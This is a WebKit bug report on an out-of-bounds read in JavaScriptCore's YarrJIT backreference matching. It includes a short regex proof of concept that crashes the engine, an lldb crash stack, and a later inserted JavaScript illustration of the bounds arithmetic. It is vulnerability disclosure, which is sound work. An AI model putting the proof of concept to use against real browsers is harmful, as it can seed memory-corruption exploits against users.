Bug 276046
| Summary: | readCharacter in JavaScriptCore YarrJIT reads wrong patternCharacter which is an OOB | | |
|---|---|---|---|
| Product: | WebKit | Reporter: | EntryHi <entryhii> |
| Component: | JavaScriptCore | Assignee: | Michael Saboff <msaboff> |
| Status: | RESOLVED DUPLICATE | | |
| Severity: | Normal | CC: | bfulgham, msaboff, webkit-bug-importer |
| Priority: | P2 | Keywords: | InRadar |
| Version: | WebKit Nightly Build | | |
| Hardware: | PC | | |
| OS: | Linux | | |
EntryHi
Hello, I found a bug in JavaScriptCore related to YarrJIT.
==============poc.js==================
const v11 = /(?<a>.)\k<a>o/vi;
const v22 = "\u{12345}bcde";
v22.split(v11);
======================================
Version: Latest JSC
JavaScriptCore commit: 7f839364528de8cde2678aa52490c1ec36268d83
Run args:
./jsc poc.js
JavaScriptCore crashed in JITTed code with SIGSEGV 11.
After analysis, I found that this bug may be related to the `matchBackreference` function in JavaScriptCore/yarr/YarrJIT.cpp.
In the matchBackreference function, JSC invokes `readCharacter` to generate JIT code which reads the patternCharacter.
When the JITted code executes, it should get "0xd808", which is the UTF-16 encoding of \u{12345}, but it incorrectly gets the 2 bytes before "0xd808", which is an OOB read.
Crash Stack:
* thread #1, name = 'jsc', stop reason = signal SIGSEGV: invalid address (fault address: 0x0)
frame #0: 0x00007fffa6c74151
-> 0x7fffa6c74151: movzwl (%r11,%r9,2), %r9d
0x7fffa6c74156: cmpl %r9d, %eax
0x7fffa6c74159: jne 0x7fffa6c741eb
0x7fffa6c7415f: jmp 0x7fffa6c74177
(lldb) bt
* thread #1, name = 'jsc', stop reason = signal SIGSEGV: invalid address (fault address: 0x0)
* frame #0: 0x00007fffa6c74151
frame #1: 0x00007ffff475aee0 libJavaScriptCore.so.1`JSC::Yarr::YarrCodeBlock::execute(this=0x00007fffe7040b00, input=span<const char16_t, 18446744073709551615UL> @ 0x00007fffffffb930, start=0, output=0x00007fffe7022340, matchingContext=0x00007fffffffba80) at YarrJIT.h:352:28
frame #2: 0x00007ffff58cc685 libJavaScriptCore.so.1`int JSC::RegExp::matchInline<WTF::Vector<int, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>, (JSC::Yarr::MatchFrom)0>(this=0x00007fffe70576c8, nullOrGlobalObject=0x00007fffa541a088, vm=0x00007fffa5000000, s=0x00007fffa5462298, startOffset=0, ovector=0x00007fffa541a8f8) at RegExpInlines.h:144:43
frame #3: 0x00007ffff58cc3b0 libJavaScriptCore.so.1`JSC::RegExp::match(this=0x00007fffe70576c8, globalObject=0x00007fffa541a088, s=0x00007fffa5462298, startOffset=0, ovector=0x00007fffa541a8f8) at RegExp.cpp:281:12
frame #4: 0x00007ffff58ebcc6 libJavaScriptCore.so.1`JSC::RegExpGlobalData::performMatch(this=0x00007fffa541a8a8, owner=0x00007fffa541a088, regExp=0x00007fffe70576c8, string=0x00007fffa5462290, input=0x00007fffa5462298, startOffset=0, ovector=0x00007fffffffbd78) at RegExpGlobalDataInlines.h:56:28
frame #5: 0x00007ffff58e838e libJavaScriptCore.so.1`void JSC::genericSplit<JSC::regExpProtoFuncSplitFast(JSC::JSGlobalObject*, JSC::CallFrame*)::$_2, JSC::regExpProtoFuncSplitFast(JSC::JSGlobalObject*, JSC::CallFrame*)::$_3>(globalObject=0x00007fffa541a088, regexp=0x00007fffe70576c8, inputString=0x00007fffa5462290, input=0x00007fffa5462298, inputSize=6, position=0x00007fffffffc0d0, matchPosition=0x00007fffffffc074, regExpIsSticky=false, regExpIsUnicode=true, control=0x00007fffffffc050, push=0x00007fffffffc018)::$_2 const&, JSC::regExpProtoFuncSplitFast(JSC::JSGlobalObject*, JSC::CallFrame*)::$_3 const&) at RegExpPrototype.cpp:432:63
frame #6: 0x00007ffff58e793b libJavaScriptCore.so.1`JSC::regExpProtoFuncSplitFast(globalObject=0x00007fffa541a088, callFrame=0x00007fffffffc1d0) at RegExpPrototype.cpp:573:5
frame #7: 0x00007fffa6c54038
frame #8: 0x00007ffff60f0389 libJavaScriptCore.so.1`llint_op_call + 213
frame #9: 0x00007ffff60cb805 libJavaScriptCore.so.1`llint_call_javascript + 6
frame #10: 0x00007ffff503050b libJavaScriptCore.so.1`JSC::Interpreter::executeProgram(this=0x00007fffa5015a10, source=0x00007fffffffce50, (null)=0x00007fffa541a088, thisObj=0x00007fffe701e008) at Interpreter.cpp:1143:28
frame #11: 0x00007ffff546c823 libJavaScriptCore.so.1`JSC::evaluate(globalObject=0x00007fffa541a088, source=0x00007fffffffce50, thisValue=JSValue @ 0x00007fffffffcd50, returnedException=0x00007fffffffce70) at Completion.cpp:137:37
frame #12: 0x00000000004b3226 jsc`runWithOptions(globalObject=0x00007fffa541a088, options=0x000000000051eca0, success=0x00007fffffffd2a3) at jsc.cpp:3774:35
frame #13: 0x00000000004553ec jsc`jscmain(this=0x00007fffffffd370, vm=0x00007fffa5000000, globalObject=0x00007fffa541a088, success=0x00007fffffffd2a3)::$_11::operator()(JSC::VM&, GlobalObject*, bool&) const at jsc.cpp:4463:13
frame #14: 0x00000000004195dd jsc`int runJSC<jscmain(int, char**)::$_11>(options=0x000000000051eca0, isWorker=false, func=0x00007fffffffd370)::$_11 const&) at jsc.cpp:4245:13
frame #15: 0x0000000000416c7c jsc`jscmain(argc=2, argv=0x00007fffffffd4d8) at jsc.cpp:4456:18
frame #16: 0x00000000004169dc jsc`main(argc=2, argv=0x00007fffffffd4d8) at jsc.cpp:3532:15
frame #17: 0x00007ffff147b1e2 libc.so.6`__libc_start_main + 242
frame #18: 0x00000000004108be jsc`_start + 46
Credit:
Jiming Wang
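The report above turns on the UTF-16 view of the input: `\u{12345}` occupies two code units, the first of which is `0xd808`, and any read in front of it is outside the buffer. The following is an added example, not code from the bug report or from WebKit; it models the char16_t span seen in frame #1 of the crash stack and the bounds check every backreference compare has to pass. The function names (`codeUnits`, `readCodeUnitChecked`, `backreferenceCompareInBounds`, `analysePocInput`) are this example's own and do not correspond to anything in YarrJIT.

```javascript
// Added example (not from the bug report or WebKit): model the UTF-16
// code-unit view that the regex engine matches against and the bounds
// check a backreference compare needs. All function names are hypothetical.

// Input string taken from the PoC: one astral character followed by ASCII.
const POC_INPUT = "\u{12345}bcde";

// Split a JS string into its UTF-16 code units, which is what a
// span<const char16_t> over a 16-bit string holds.
function codeUnits(str) {
  const units = [];
  for (let i = 0; i < str.length; i++) units.push(str.charCodeAt(i));
  return units;
}

// Bounds-checked read of a single code unit. Index -1 corresponds to the
// "2 bytes before 0xd808" read described in the report; a checked reader
// rejects it instead of dereferencing memory in front of the buffer.
function readCodeUnitChecked(units, index) {
  if (!Number.isInteger(index) || index < 0 || index >= units.length) {
    throw new RangeError(`code-unit index ${index} outside [0, ${units.length})`);
  }
  return units[index];
}

// A backreference compares the captured span [captureStart, captureEnd)
// with the same number of code units starting at pos. Return true only if
// every index the compare would touch lies inside the input.
function backreferenceCompareInBounds(units, captureStart, captureEnd, pos) {
  const len = captureEnd - captureStart;
  if (len < 0 || captureStart < 0 || captureEnd > units.length) return false;
  return pos >= 0 && pos + len <= units.length;
}

// Summarise the PoC input: its code units in hex, its length, and whether
// the out-of-bounds read from the report is caught by the checked reader.
function analysePocInput() {
  const units = codeUnits(POC_INPUT);
  let oobCaught = false;
  try {
    readCodeUnitChecked(units, -1);
  } catch (e) {
    oobCaught = e instanceof RangeError;
  }
  return {
    hex: units.map((u) => "0x" + u.toString(16).padStart(4, "0")),
    length: units.length,   // 6 code units, matching inputSize=6 in frame #5
    firstUnit: units[0],    // 0xd808, the high surrogate of U+12345
    oobCaught,
  };
}

console.log(analysePocInput());
```

Run with `node` on any version that supports `\u{...}` escapes; the PoC regex itself is deliberately not evaluated here, since the point is the index arithmetic, not the engine. The `length` of 6 agrees with the `inputSize=6` argument visible in frame #5 of the reporter's backtrace, and `firstUnit` is the `0xd808` the report says `readCharacter` should have produced.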
Radar WebKit Bug Importer
<rdar://problem/130839510>
Michael Saboff
*** This bug has been marked as a duplicate of bug 275528 ***